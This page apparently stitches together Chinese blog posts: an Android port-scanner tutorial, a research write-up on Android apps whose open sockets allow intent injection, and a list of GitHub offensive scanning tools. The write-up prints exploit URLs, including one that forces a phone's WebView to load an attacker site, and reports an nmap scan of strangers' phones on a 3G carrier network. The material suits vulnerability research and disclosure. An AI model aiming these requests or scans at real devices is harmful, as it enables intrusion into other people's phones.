• 服务器端口扫描

    2013-09-07 11:38:24
    通过不断连接服务器的各个端口来测试哪个端口已经打开: 1.new android project:PortsScan 2.修改activity_main.xml: <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:...

    通过不断连接服务器的各个端口来测试哪个端口已经打开:

    1.new android project:PortsScan

    2.修改activity_main.xml:

    <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
        android:layout_width="fill_parent" android:layout_height="wrap_content"
        android:orientation="vertical">
        <Button android:layout_width="match_parent" android:layout_height="wrap_content"
            android:text="@string/initScan" android:id="@+id/startScan"/>
    
        <TextView
            android:id="@+id/tvPorts"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="@string/prompt" />
    
    </LinearLayout>

    3.实现MainActivity.java

    package cn.yh.portsscan;
    
    import java.net.InetSocketAddress;
    import java.net.Socket;
    import java.net.SocketAddress;
    
    import android.os.Bundle;
    import android.os.Handler;
    import android.os.Message;
    import android.app.Activity;
    import android.util.Log;
    import android.view.Menu;
    import android.view.View;
    import android.view.View.OnClickListener;
    import android.widget.Button;
    import android.widget.TextView;
    import android.widget.Toast;
    
    public class MainActivity extends Activity{
    	private final String TAG = "PortsScan";
    	private TextView tvPorts;
    	private Button startScan;
    	private Handler handler = new Handler(){
    
    		@Override
    		public void handleMessage(Message msg) {
    			// TODO Auto-generated method stub
    			//将已经打开的端口号显示在TextView控件上
    			tvPorts.append(String.valueOf(msg.what) + ":ok\n");
    			Log.i(TAG, String.valueOf(msg.what));
    			super.handleMessage(msg);
    		}
    		
    	};
    	
    	@Override
    	protected void onCreate(Bundle savedInstanceState) {
    		super.onCreate(savedInstanceState);
    		setContentView(R.layout.activity_main);
    		tvPorts = (TextView) findViewById(R.id.tvPorts);
    		startScan = (Button)findViewById(R.id.startScan);
    		startScan.setOnClickListener(new OnClickListener() {
    			
    			@Override
    			public void onClick(View arg0) {
    				// TODO Auto-generated method stub
    				Thread thread = new Thread(new ScanPorts(1,1000));
    				thread.start();
    				Toast.makeText(MainActivity.this, "开始扫描", Toast.LENGTH_LONG).show();
    			}
    		});
    	}
    
    	class ScanPorts extends Thread{
    		private int minPort, maxPort;
    
    		public ScanPorts(int minPort, int maxPort) {
    			this.minPort = minPort;
    			this.maxPort = maxPort;
    		}
    
    		@Override
    		public void run() {
    			// TODO Auto-generated method stub
    			for(int i=minPort; i<=maxPort; i++){
    				try{
    					Socket socket = new Socket();
    					SocketAddress socketAddress = new InetSocketAddress("192.168.1.100", i);
    					socket.connect(socketAddress,50);
    					handler.sendEmptyMessage(i);
    					socket.close();
    				}catch(Exception e){
    					Log.e(TAG, e.getMessage());
    				}
    			}
    			handler.post(new Runnable() {
    				
    				@Override
    				public void run() {
    					// TODO Auto-generated method stub
    					Toast.makeText(MainActivity.this, "扫描完成", Toast.LENGTH_LONG).show();
    				}
    			});
    			super.run();
    		}
    		
    	}
    	
    	@Override
    	public boolean onCreateOptionsMenu(Menu menu) {
    		// Inflate the menu; this adds items to the action bar if it is present.
    		getMenuInflater().inflate(R.menu.main, menu);
    		return true;
    	}
    
    }
    

    4.在AndroidManifest.xml开启Internet访问权限
    <uses-permission android:name="android.permission.INTERNET"/>

    运行结果:

    其中192.168.1.100是我本机IP;

    展开全文
  • Android应用通常使用PF_UNIX、PF_INET、PF_NETLINK等不同domain的socket来进行本地IPC或者远程网络通信,这些暴露的socket代表了潜在的本地或远程攻击面,历史上也出现过不少利用socket进行拒绝服务、root提权或者...

    0x00 简介


    Android应用通常使用PF_UNIX、PF_INET、PF_NETLINK等不同domain的socket来进行本地IPC或者远程网络通信,这些暴露的socket代表了潜在的本地或远程攻击面,历史上也出现过不少利用socket进行拒绝服务、root提权或者远程命令执行的案例。特别是PF_INET类型的网络socket,可以通过网络与Android应用通信,其原本用于linux环境下开放网络服务,由于缺乏对网络调用者身份或者本地调用者pid、permission等细粒度的安全检查机制,在实现不当的情况下,可以突破Android的沙箱限制,以被攻击应用的权限执行命令,通常出现比较严重的漏洞。作为Android安全研究的新手,笔者带着传统服务器渗透寻找开放socket端口的思路,竟然也刷了不少漏洞,下面就对这种漏洞的发现、案例及影响进行归纳。

    0x01 Android开放端口应用定位


    简单地利用命令netstat就可以发现Android开放了许多socket端口,如图。但这些开放端口本后的应用却不得而知。

    enter image description here

    此时可以通过三步定位法进行寻找(感谢@瘦蛟舞的帖子),支持非root手机。

    第一步,利用netstat寻找感兴趣的开放socket端口,如图中的15555。

    第二步,将端口转换为十六进制值,查看位于/proc/net/目录下对应的socket套接字状态文件,在其中找到使用该socket的应用的uid。如15555的十六进制表示为1cc3,协议类型为tcp6,那么查看/proc/net/tcp6文件。

    enter image description here

    注意上面的10115,就是使用该socket的应用的uid。通过这个uid可以得知应用的用户名为u0_a115。

    第三步,根据用户名就可以找到应用了

    enter image description here

    至此,我们就知道开放15555端口的应用为com.qiyi.video,尽管我们还不能分辨出开放该端口的准确进程,但仍然为进一步的漏洞挖掘打下基础。

    写一个简单的脚本来自动化的完成此项工作.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    import subprocess,re
     
    def toHexPort(port):
        hexport = str(hex(int(port)))
        return hexport.strip('0x').upper()
     
    def finduid(protocol, entry):
        if (protocol=='tcp' or protocol=='tcp6'):
            uid = entry.split()[-10]
        else: # udp or udp6
            uid = entry.split()[-6]
        uid = int(uid)
        if (uid > 10000): # just for non-system app
            return 'u0_a'+str(uid-10000)
        else:
            return -1
     
    def main():
        netstat_cmd = "adb shell netstat | grep -Ei 'listen|udp*'"
        #netstat_cmd = "adb shell netstat "
        grep_cmd = "adb shell grep"
        proc_net = "/proc/net/"
     
    # step 1, find interesting port
        orig_output = subprocess.check_output(netstat_cmd, shell=True)
        list_line = orig_output.split('\r\n')
     
        apps = []
        strip_listline = []
        pattern = re.compile("^Proto") # omit the first line
     
        for line in list_line:
            if (line != '') and (pattern.match(line)==None):
     
    # step 2, find uid in /proc/net/[protocol] based on port
                socket_entry = line.split()
                protocol = socket_entry[0
                port = socket_entry[3].split(':')[-1]
                grep_appid = grep_cmd+' '+ toHexPort(port)+' '+proc_net + protocol
                net_entry = subprocess.check_output(grep_appid, shell=True)
                uid = finduid(protocol, net_entry)
    # step 3, find app username based on uid
                if (uid == -1): continue
                applist = subprocess.check_output('adb shell ps | grep '+uid, shell=True).split()
                app = applist[8]
                apps.append(app)
                strip_listline.append(line)
     
        itapp= iter(apps)
        itline=iter(strip_listline)
    # last, add app in orig_output of sockets
        print ("Package                  Proto Recv-Q Send-Q         Local Address          Foreign Address        State\r\n")
        try:
            while True:
                print itapp.next()+' '+itline.next()
        except StopIteration:
            pass
     
    if __name__ == '__main__':
        main()

    运行结果如下

    enter image description here

    除了PF_INET套接字外,PF_UNIX、PF_NETLINK套接字的状态文件分别位于/proc/net/unix和/proc/net/netlink。

    当然,如果手机已root,可直接使用busybox安装目录下带p参数的netstat命令,可以显示pid和不完整的program name。

    enter image description here

    0x02 漏洞挖掘实例


    得知某个应用开放某个端口以后,接下就可以在该应用的逆向代码中搜索端口号(通常是端口号的16进制表示),重点关注ServerSocket(tcp)、DatagramSocket(udp)等类,定位到关键代码,进一步探索潜在的攻击面,下面列举一些漏洞实例。

    1、敏感信息泄露、控制手机

    WooYun-2015-94537:某service打开udp的65502端口监听,接收特定的命令字后可返回手机的敏感信息,包括手机助手远程管理手机的SecretKey,进而未授权的攻击者可通过网络完全管理手机。

    CVE-2014-8757, LG On-Screen Phone预装App认证绕过漏洞。

    2、命令执行

    这类漏洞比较常见,通常通过开放socket端口传入启动android应用组件的intent,然后以被攻击应用的权限执行启动activity、发送广播等操作。由于通过socket传入的intent,无法对发送者的身份和权限进行细粒度检查,绕过了Android提供的对应用组件的权限保护,能够启动未导出的和受权限保护的应用组件,对安全造成影响。

    如果监听的端口是在本地,那么可能造成本地命令执行和权限提升,而如果监听的端口是任意地址,则可能造成比较严重的远程命令执行。

    3、本地命令执行:

    用前面端口应用定位的方法,发现某流行应用实现了一个小型的HTTP Server,监听本地的9527端口,简单搜索分析即可发现向该端口发送如下形式的HTTP请求时可执行命令。

    http://127.0.0.1:9527/si?cmp=<pacakgename>_<componentname>&data=<url scheme>&act=<action name>
    

    通过这个简单的HTTP请求,恶意程序就可以传入intent对象的包名、组件名、url和action,接收HTTP请求后执行命令的代码如下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    ...
            if(v3.hasNext()) {
                Object v6 = v3.next();
                if("act".equals(v6)) {
                    v4.setAction(v10.b.get(v6));
                }
                if("cmp".equals(v6)) {
                    String[] v9 = v10.b.get(v6).split("_");
                    if(v9 == null) {
                        goto label_39;
                    }
                    if(v9.length != 2) {
                        goto label_39;
                    }
                    v4.setComponent(new ComponentName(v9[0], v9[1]));
                }
     
            label_39:
     
                if("data".equals(v6)) {
                    v4.setData(Uri.parse(v10.b.get(v6)));
                }
     
                if(!"callback".equals(v6)) {
                    goto label_13;
                }
                Object v1_1 = v10.b.get(v6);
                goto label_13;
            }
     
            if((TextUtils.isEmpty(v4.getAction())) && v4.getComponent() == null && v4.getData() == null) {
     
                if(TextUtils.isEmpty(((CharSequence)v1))) {
                    return "{\"result\":-20000}";
                }
                return this.a(v1, "{\"result\":-20000}");
            }
            List v0 = this.a.getPackageManager().queryIntentActivities(v4, 0);
            if(v0.size() == 0) {
                if(TextUtils.isEmpty(((CharSequence)v1))) {
                    return "{\"result\":-10000}";
                }
                return this.a(v1, "{\"result\":-10000}");
            }
            try {
                this.a.startActivity(v4);
            }
    ...

    最终通过HTTP请求设置的Intent对象,传入了startActivity方法,由于需要用户干预,危害并不大。但当packagename指定为该应用自身,componentname指定为该应用的activity时,可以启动该应用的任意activity,包括受保护的未导出activity,从而对安全造成影响。例如,通过HTTP请求,逐一启动若干未导出的activity,可以发现拒绝服务漏洞、对安全有影响的登录界面和有一个可以该应用权限执行任意命令的GUI shell。

    远程命令执行:

    1. 趋势科技曾经发现过美团客户端漏洞,可以通过TCP的9527端口传入intent data,进而启动activity,见参考文献[1].

    2. 远程强制webview访问恶意链接

    定位到某流行应用实现了一个小型的HTTP Server,在tcp的6677端口监听任意地址,当HTTP请求满足一定条件时可以返回敏感信息,并根据请求消息执行一系列动作。对于该HTTP请求,仅有的防御措施是通过referer白名单的方式判断HTTP请求的来源。在正确设置referer,发送如下HTTP GET请求后

    http://ip:6677/command?param1=value1&...&paramn=valuen
    

    可获取手机的敏感信息和实现命令执行。其中command为getpackageinfo、androidamap、geolocation中的其一,见如下代码片段。

    enter image description here

    (1)当command为geolocation时,可返回安装该应用手机地理位置信息;

    (2)当command为getpackageinfo时,默认返回该应用自身的版本信息。此时若指定参数param1为packagename,即请求http://ip:6677/getpackageinfo?packagename=xxx时(xxx为软件包名)可返回手机上安装的xxx所指定的任意软件包版本信息。若xxx为android,可返回android系统版本信息;

    (3)当command为androidamap时,设置Intent并将其广播出去,查看对应的OnReceive方法

    enter image description here

    发现需要指定参数param1为action,即请求

    http://ip:6677/androidamap?action=yyy&param2=value2&...&paramn=valuen
    

    时,OnReceive方法取出前面广播intent对象的extra,新建一个intent对象,设置intent uri为

    androidamap://yyy?sourceApplication=web&param2=value2&...&paramn=valuen
    

    并以隐式intent的形式启动注册这种uri scheme的activiy。

    进一步搜索发现如下代码:

    1
    2
    3
    4
    5
    6
    7
    Uri v0_2 = Uri.parse("androidamap://openFeature?featureName=OpenURL&sourceApplication=banner&urlType=0&contentType=autonavi&url="
                                 + this.a.m.privilegeLink);
        Intent v1 = new Intent(MovieDetailHeaderView.c(this.a).getApplicationContext(),
                                NewMapActivity.class);
        v1.setData(v0_2);
        v1.setFlags(268435456);
        MovieDetailHeaderView.c(this.a).startActivity(v1);

    表明可以通过远程HTTP GET请求如下地址

    http://ip:6677/androidamap?action=openFeature&featureName=OpenURL&sourceApplication=banner&urlType=0&contentType=autonavi&url=evilsite
    

    操纵安装该app的手机继承WebView的Activity访问evilsite,而且这里存在WebView的漏洞,利用方式包括

    (1). 窃取私有目录下的敏感文件:远程攻击者或者本地恶意app可以令WebView加载file://域的恶意脚本文件,按照恶意脚本的请求,窃取该应用私有目录下的敏感文件,突破android沙箱限制;

    (2). WebView远程命令执行:存在可被网页中js操纵的接口jsinterface。由于该流行应用针对的SDK版本较低(android:minSdkVersion="8"),在Android 4.4.2以下的手机,均可使用该接口,通过js注入该应用进程执行命令。

    0x03 漏洞利用场景


    对于Android app开放socket端口漏洞的远程利用场景,一般认为Android客户端都在内网,其利用主要还是在非安全的公共WiFi环境,通过对漏洞特征扫描即可利用。但在传统认为安全的移动互联网环境,笔者发现仍然可以扫描到其他开放端口的终端,因此也可以利用这种漏洞。

    叙述之前,我们先对典型的移动通信网络架构进行简单的科普,一般教科书上的3G网络架构(WCDMA)如图。

    enter image description here

    包括以下组成部分:

    1. UE: 用户终端设备,就是手机,为用户提供电路域和分组域内的各种业务功能。

    2. UTRAN: 陆地无线接入网,分为基站(Node B)和无线网络控制器(RNC)两部分。

    3. CN: 核心网络,负责与其他网络的连接和对UE 的通信和管理。主要功能实体包括:

      (1) MSC/VLR:提供CS(电路交换)域的呼叫控制、移动性管理、鉴权和加密等功能;

      (2) GMSC:网关移动交换中心,充当移动网和固定网之间的移动关口局,承担路由分析、网间接续、网间结算等重要功能;

      (3) SGSN:GPRS服务支持节点,提供PS(分组交换)域的路由转发、移动性管理、会话管理、鉴权和加密等功能;

      (4) GGSN:网关GPRS支持节点,提供数据包在WCDMA 移动网和外部数据网之间的路由和封装,GGSN就好象是可寻址WCDMA移动网络中所有用户IP 的路由器,需要同外部网络交换路由信息。

      (5) HLR:归属位置寄存器,提供用户的签约信息存放、新业务支持、增强的鉴权等功能。

    4. External Networks:外部网络,包括ISDN和PSTN等电路交换网络,以及Internet等分组交换网络。

    简而言之,移动通信网络无非是大型的“局域网“,它们通过网关路由器(SGSN和GGSN)连上了Internet,进入到了互联网的世界。但是在某些移动通信网络的内部,不同的UE是可以互访的。以前面某应用开放6677端口为例,我们可以做一个简单的实验进行证明。

    使用联通3G网络,查看当前IP地址。

    enter image description here

    在相邻C段进行扫描,扫描到开放端口的手机

    nmap -sT --open -p6677 10.160.112.0/24
    

    发现如下结果

    enter image description here

    这证明在移动网络中,不同的UE可以互访。因此如果开放上述socket端口的app存在漏洞,在移动网络中也是可以利用的。

    0x04 小结


    对于客户端的远程漏洞利用,从攻击者的角度来看,通常更容易使用“受”的方法,即通过欺骗、劫持或社工的方法来让客户端访问我的攻击载荷。然而,从笔者发现的漏洞案例来看,许多Android应用不正确地使用网络socket端口传入命令进行跨进程通信,而且对于本地应用环境,网络socket也先天缺乏细粒度的认证授权机制,因此把Android客户端当做服务器,使用“攻”的方法,主动向开放端口发送攻击载荷也是可行的。这种漏洞一旦存在,轻则本地提权,重则为远程利用的高危漏洞,3G移动网络允许UE互访更是加剧了这种风险。

    此外,除PF_INET外,PF_UNIX、PF_NETLINK域的套接字也是值得关注的本地攻击面。

    参考文献:[1] http://blog.trendmicro.com/trendlabs-security-intelligence/open-socket-poses-risks-to-android-security-model

    展开全文
  • 公众号更新的少了,发一个扫描器列表,方便查看和使用扫描器是来自GitHub平台的开源扫描器的集合,包括子域枚举、数据库漏洞扫描器、弱密码或信息泄漏扫描器端口扫描器、指纹扫描器以及其他大规模扫描仪、模块扫描...

    黑客喜欢的扫描器盒子


          最近实在太忙,公众号更新的少了,发一个扫描器列表,方便查看和使用

    扫描器是来自GitHub平台的开源扫描器的集合,包括子域枚举、数据库漏洞扫描器、弱密码或信息泄漏扫描器、端口扫描器、指纹扫描器以及其他大规模扫描仪、模块扫描器等。对于其他著名的扫描工具,如:awvs、nmap,w3af将不包含在集合范围内。

    子域扫描仪或枚举工具

    · https://github.com/lijiejie/subDomainsBrute(由lijiejie提供的一个经典子域枚举工具)

    · https://github.com/ring04h/wydomain(用ringzero进行速度和精度子域枚举工具)

    · https://github.com/le4f/dnsmaper(带有地图记录的子域枚举工具)

    · https://github.com/0xbug/orangescan(联机子域枚举工具)

    · https://github.com/TheRook/subbrute(dns元查询蜘蛛,枚举dns记录,以及子域,支持api)

    · https://github.com/We5ter/GSDF(通过google证书透明度进行子域枚举)

    · https://github.com/mandatoryprogrammer/cloudflare_enum(通过CloudFlare进行子域枚举)

    · https://github.com/guelfoweb/knock(敲门子域扫描)

    · https://github.com/exp-db/PythonPool/tree/master/Tools/DomainSeeker(IntergrodPython子域枚举工具)

    · https://github.com/code-scan/BroDomain(找兄弟域)

    · https://github.com/chuhades/dnsbrute(快速域野蛮工具)

    · https://github.com/yanxiu0614/subdomain3(一个简单而快速的子域生成工具)

    · https://github.com/michenriksen/aquatone(强大的子域工具和域收购查找工具)

    · https://github.com/evilsocket/dnssearch(子域枚举工具)

    · https://github.com/reconned/domained(用于bug搜索的子域枚举工具)

    · https://github.com/bit4woo/Teemo(域名和电子邮件地址收集工具)

    · https://github.com/laramies/theHarvester(电子邮件、子域名和人名收割机)

    · https://github.com/swisskyrepo/Subdomino(一个枚举子域的应用程序,并用几个规则扫描它们)

    · https://github.com/nmalcolm/Inventus(蜘蛛)通过爬行来寻找特定领域的子域

    · https://github.com/aboul3la/Sublist3r(用于渗透测试人员的快速子域枚举工具)

    · https://github.com/jonluca/Anubis(子域枚举和信息收集工具)

    · https://github.com/n4xh4ck5/N4xD0rk(列出关于主域的子域)

    · https://github.com/infosec-au/altdns(通过修改和排列发现子域)

    数据库漏洞扫描器或枚举工具

    · https://github.com/0xbug/SQLiScanner(通过sqlmap和charles进行的一个基于漏洞的漏洞扫描)

    · https://github.com/stamparm/DSSS(SQLi漏洞扫描器有99行代码)

    · https://github.com/LoRexxar/Feigong(用于MySQL的SQLi漏洞扫描器)

    · https://github.com/youngyangyang04/NoSQLAttack(用于mongodb的一个基于漏洞的漏洞扫描)

    · https://github.com/Neohapsis/bbqsql(一种盲的低密度漏洞扫描器)

    · https://github.com/NetSPI/PowerUpSQL(一个带Powershell脚本的SQLi漏洞扫描程序)

    · https://github.com/WhitewidowScanner/whitewidow(另一个SQL漏洞扫描器)

    · https://github.com/stampery/mongoaudit(强大的mongodb审核和pentesting工具)

    · https://github.com/torque59/Nosql-Exploitation-Framework(用于计算机辅助扫描和开发的python框架)

    · https://github.com/missDronio/blindy(简单脚本来自动实现盲sql注入漏洞)

    · https://github.com/fengxuangit/Fox-scan(一个主动和被动sql注入易受攻击测试工具)

    · https://github.com/NetSPI/PowerUpSQL(攻击SQLServer的PowerShell工具包)

    · https://github.com/JohnTroony/Blisqy(利用HTTPHeader中基于时间的盲SQL注入)

    · https://github.com/ron190/jsql-injection(用于从远程服务器查找数据库信息的轻量级应用程序)

    · https://github.com/Hadesy2k/sqliv(大规模sql注入漏洞扫描器)

    · https://github.com/UltimateHackers/sqlmate(sqlmap的一个朋友,它将做您一直期望的sqlmap)

    · https://github.com/m8r0wn/enumdb(MySQL和MSSQL蛮力和开发后工具)

    弱密码/用户扫描器或枚举工具

    · https://github.com/lijiejie/htpwdScan(pythonHTTP弱传递扫描器)

    · https://github.com/ysrc/F-Scrack(单文件蛮力支持多协议)

    · https://github.com/Mebus/cupp(普通用户密码分析器)

    · https://github.com/netxfly/crack_ssh(SSH\redis\MongoDB弱密码强者)

    · https://github.com/LandGrey/pydictor(一个有用的黑客词典生成器,用于暴力攻击)

    · https://github.com/shengqi158/weak_password_detect(pythonHTTP弱密码扫描器)

    · https://github.com/UltimateHackers/Blazy(Blaz是一个现代的登录强人,它还测试CSRF、Clickjacking、Cloudflare和WAF)

    · https://github.com/MooseDojo/myBFF(web应用程序蛮力框架,支持Citrix网关、CiscoVPN等)

    物联网探测工具或扫描仪

    · https://github.com/rapid7/IoTSeeker(弱密码物联网设备扫描器)

    · https://github.com/shodan-labs/iotdb(物联网设备扫描仪通过nmap)

    · https://github.com/googleinurl/RouterHunterBR(测试连接到Internet的设备和路由器的漏洞)

    · https://github.com/scu-igroup/telnet-scanner(基于密码枚举的弱telnet密码扫描器)

    · https://github.com/viraintel/OWASP-Nettacker(网络信息收集漏洞扫描器,最适合扫描物联网)

    反射或基于DOM的xss扫描仪

    · https://github.com/shawarkhanethicalhacker/BruteXSS(跨站点脚本编程)

    · https://github.com/1N3/XSSTracer(用于检查跨站点跟踪的小型python脚本)

    · https://github.com/0x584A/fuzzXssPHP(一个非常简单的反射XSS扫描仪支持GET/POST)

    · https://github.com/chuhades/xss_scan(反射xss扫描器)

    · https://github.com/BlackHole1/autoFindXssAndCsrf(浏览器的插件,它自动检查页面是否具有xss和漏洞)

    · https://github.com/shogunlab/shuriken(xss命令行工具用于测试web应用程序中xss负载列表)

    · https://github.com/UltimateHackers/XSStrike(用于XSS、WAF检测和旁路的模糊和蛮力参数)

    · https://github.com/stamparm/DSXS(一个完全功能的跨站点脚本漏洞扫描器,支持获取和发布参数,并写入100行代码)

    企业资产管理或泄漏收集工具

    · https://github.com/ysrc/xunfeng(脆弱性快速响应、内联网扫描系统)

    · https://github.com/laramies/theHarvester(电子邮件、子域名和人名收割机)

    · https://github.com/x0day/Multisearch-v2(基于搜索引擎的企业资产收集器)

    · https://github.com/Ekultek/Zeus-Scanner(一种高级的DOCK搜索工具,能够找到被搜索引擎阻塞的IP地址/URL,并且可以在URL上运行sqlmap和nmap扫描)

    · https://github.com/0xbug/Biu-framework(基于企业内联网服务的安全扫描框架)

    · https://github.com/metac0rtex/GitHarvester(用于从GitHub获取信息)

    · https://github.com/shengqi158/svnhack(A).svn文件夹泄露漏洞)

    · https://github.com/repoog/GitPrey(在GitHub中搜索敏感文件和内容)

    · https://github.com/0xbug/Hawkeye(GitHub泄漏扫描企业)

    · https://github.com/lianfeng30/githubscan(企业GitHub泄漏扫描)

    · https://github.com/UnkL4b/GitMiner(高级搜索工具和Gizub的自动化)

    · https://github.com/lijiejie/GitHack(A).git文件夹泄露漏洞)

    · https://github.com/dxa4481/truffleHog(通过git存储库搜索高熵字符串)

    · https://github.com/1N3/Goohak(自动启动针对目标域的Google黑客查询)

    · https://github.com/UKHomeOffice/repo-security-scanner(发现意外提交给gitrepo的秘密的cli工具,如密码、私钥)

    · https://github.com/FeeiCN/GSIL(GitHub敏感信息泄漏)

    · https://github.com/MiSecurity/x-patrol(GitHub泄密巡逻)

    · https://github.com/1N3/BlackWidow(在目标网站上收集OSINT和Fuzz的OWASP漏洞)

    webshell检测或恶意软件分析工具

    · https://github.com/ym2011/ScanBackdoor(简易webshell探测器)

    · https://github.com/yassineaddi/BackdoorMan(一个工具包在选定的目的地中找到恶意、隐藏和可疑的php脚本和shell)

    · https://github.com/he1m4n6a/findWebshell(简易webshell探测器)

    · https://github.com/Tencent/HaboMalHunter(用于Linux系统上的自动恶意软件分析和安全性评估)

    · https://github.com/PlagueScanner/PlagueScanner(开放源码多AV扫描仪框架)

    · https://github.com/nbs-system/php-malware-finder(一个用于检测潜在恶意php文件的可怕工具)

    · https://github.com/emposha/PHP-Shell-Detector(帮助您查找并识别php/cgi(Perl)/asp/ASPX shell)

    · https://github.com/erevus-cn/scan_webshell(简易webshell探测器)

    · https://github.com/emposha/Shell-Detector(一个帮助您查找和识别php/perl/asp/ASPX shell的应用程序)

    · https://github.com/m4rco-/dorothy2(用Ruby编写的恶意软件/僵尸网络分析框架)

    · https://github.com/droidefense/engine(改进Android恶意软件分析框架)

    内联网渗透工具或扫描仪

    · https://github.com/0xwindows/VulScritp(内联网渗透测试脚本)

    · https://github.com/lcatro/network_backdoor_scanner(内部网络扫描器,如计量器)

    · https://github.com/fdiskyou/hunter(用户猎人只使用WinAPI调用)

    · https://github.com/BlackHole1/WebRtcXSS(使用XSS自动化入侵Intranet)

    中间件扫描仪或指纹工具

    · https://github.com/ring04h/wyportmap(目标端口扫描+系统服务指纹识别)

    · https://github.com/ring04h/weakfilescan(动态多线程敏感信息泄漏检测工具)

    · https://github.com/EnableSecurity/wafw00f(标识和指纹web应用防火墙)

    · https://github.com/rbsec/sslscan(测试ssl/tls启用服务,以发现支持密码套件)

    · https://github.com/urbanadventurer/whatweb(网站FingerPrint)

    · https://github.com/tanjiti/FingerPrint(另一个网站FingerPrint)

    · https://github.com/nanshihui/Scan-T(一种基于python的新蜘蛛,具有更多的功能,包括网络指纹搜索)

    · https://github.com/OffensivePython/Nscan(快速互联网扫描)

    · https://github.com/ywolf/F-NAScan(扫描网络资产信息脚本)

    · https://github.com/ywolf/F-MiddlewareScan(中间件服务的漏洞检测脚本)

    · https://github.com/maurosoria/dirsearch(网络路径扫描器)

    · https://github.com/x0day/bannerscan(C段横幅带路径扫描器)

    · https://github.com/RASSec/RASscan(内部网络端口速度扫描器)

    · https://github.com/3xp10it/bypass_waf(自动waf旁路工具)

    · https://github.com/3xp10it/xcdn(试图找出cdn背后的实际ip)

    · https://github.com/Xyntax/BingC(基于Bing搜索引擎C/Side-Stop查询,多线程,支持API)

    · https://github.com/Xyntax/DirBrute(多线程web目录枚举工具)

    · https://github.com/zer0h/httpscan(来自ip/cidr的爬虫类的http服务检测器)

    · https://github.com/lietdai/doom(基于刺的ip端口脆弱性扫描器分布式任务分配)

    · https://github.com/chichou/grab.js(快速tcp横幅抓取像zgrab,但支持更多协议)

    · https://github.com/Nitr4x/whichCDN(检测给定网站是否受到内容传递网络的保护)

    · https://github.com/secfree/bcrpscan(基于爬虫结果的网页路径扫描器)

    · https://github.com/mozilla/ssh_scan(SSH配置和策略扫描器原型)

    · https://github.com/18F/domain-scan(扫描域上的数据,它们的https配置和其他事物)

    · https://github.com/ggusoft/inforfinder(一种用于收集指向服务器和指纹打印机的任何域信息的工具)

    · https://github.com/boy-hack/gwhatweb(用于CMS的指纹打印机)

    · https://github.com/Mosuan/FileScan(敏感文件扫描器)

    · https://github.com/Xyntax/FileSensor(基于爬虫的动态文件检测工具)

    · https://github.com/deibit/cansina(Web内容发现工具)

    · https://github.com/0xbug/Howl(网络设备、网络服务、指纹扫描仪和数据库)

    · https://github.com/mozilla/cipherscan(一种非常简单的方法,可以找出目标支持哪些SSL加密套件)

    · https://github.com/xmendez/wfuzz(Web应用程序模糊/框架和Web内容扫描器)

    · https://github.com/UltimateHackers/Breacher(用python编写的高级多线程管理面板查找程序)

    · https://github.com/ztgrace/changeme(默认的凭据扫描器)

    · https://github.com/medbenali/CyberScan(一种开放源码渗透测试工具,可以分析数据包、解码、扫描端口、敲击和定位IP)

    · https://github.com/m0nad/HellRaiser(用nmap进行螺旋扫描,然后将cpe的cpe与cve搜索关联起来,以枚举漏洞)

    · https://github.com/scipag/vulscan(用Nmap nse进行高级脆弱性扫描)

    · https://github.com/jekyc/wig(Webapp Information Gatherer)

    · https://github.com/eldraco/domain_analyzer(通过查找所有可能的信息来分析任何域的安全性)

    · https://github.com/cloudtracer/paskto(基于nikto数据库的被动目录扫描和web爬虫)

    · https://github.com/zerokeeper/WebEye(一个web服务和waf fingerprinter)

    · https://github.com/m3liot/shcheck(只需检查目标网站上的安全标头)

    · https://github.com/aipengjie/sensitivefilescan(一个速度快、非常棒的敏感文件扫描仪)

    · https://github.com/fnk0c/cangibrina(快速而又高精度的仪表板(管理)查找器)

    · https://github.com/n4xh4ck5/CMSsc4n(用于识别域是否为CMS的工具,如Wordpress、Moodle、Joomla)

    · https://github.com/Ekultek/WhatWaf(检测和绕过web应用防火墙和保护系统)

    · https://github.com/dzonerzy/goWAPT(转web应用程序渗透测试和web应用程序模糊工具)

    · https://github.com/blackye/webdirdig(敏感文件扫描器)

    特殊扫描仪(仅用于某些特殊组件)

    · https://github.com/blackye/Jenkins(Jenkins漏洞检测,用户抓取枚举)

    · https://github.com/code-scan/dzscan(盘式扫描器)

    · https://github.com/chuhades/CMS-Exploit-Framework(CMS开发框架)

    · https://github.com/lijiejie/IIS_shortname_Scanner(IIS短名扫描仪)

    · https://github.com/riusksk/FlashScanner(闪光灯XSS扫描器)

    · https://github.com/coffeehb/SSTIF(服务器端模板注入工具)

    · https://github.com/epinna/tplmap(自动服务器端模板注入检测和开发工具)

    · https://github.com/cr0hn/dockerscan(码头安全分析及黑客工具)

    · https://github.com/m4ll0k/WPSeku(简单的Wordpress安全扫描器)

    · https://github.com/rastating/wordpress-exploit-framework(用于开发和使用支持wordpress功能网站和系统渗透测试模块的ruby框架)

    · https://github.com/ilmila/J2EEScan(为Burp Suite Proxy提供插件,以提高在J2EE应用程序上进行Web应用程序渗透测试时的测试覆盖率)

    · https://github.com/riusksk/StrutScan(Struts2.vuls.扫描仪基perl脚本)

    · https://github.com/D35m0nd142/LFISuite(全自动LFI开发扫描仪支持反壳)

    · https://github.com/0x4D31/salt-scanner(基于盐开放和基于Vulners的审计api的linux漏洞扫描器,具有松弛通知和JIRA集成)

    · https://github.com/tijme/angularjs-csti-scanner(用于AngularJS的自动客户端模板注入检测)

    · https://github.com/irsdl/IIS-ShortName-Scanner(iis短文件名8.3的扫描器泄漏漏洞)

    · https://github.com/swisskyrepo/Wordpresscan(WPScan在python+中重写了一些WPSeku的想法)

    · https://github.com/CHYbeta/cmsPoc(CMS开发框架)

    · https://github.com/rudSarkar/crlf-injector(自动喷射喷射器)

    · https://github.com/3gstudent/Smbtouch-Scanner(自动扫描内部网络以检测它们是否易受攻击)

    · https://github.com/utiso/dorkbot(命令行工具扫描google搜索结果以获取漏洞)

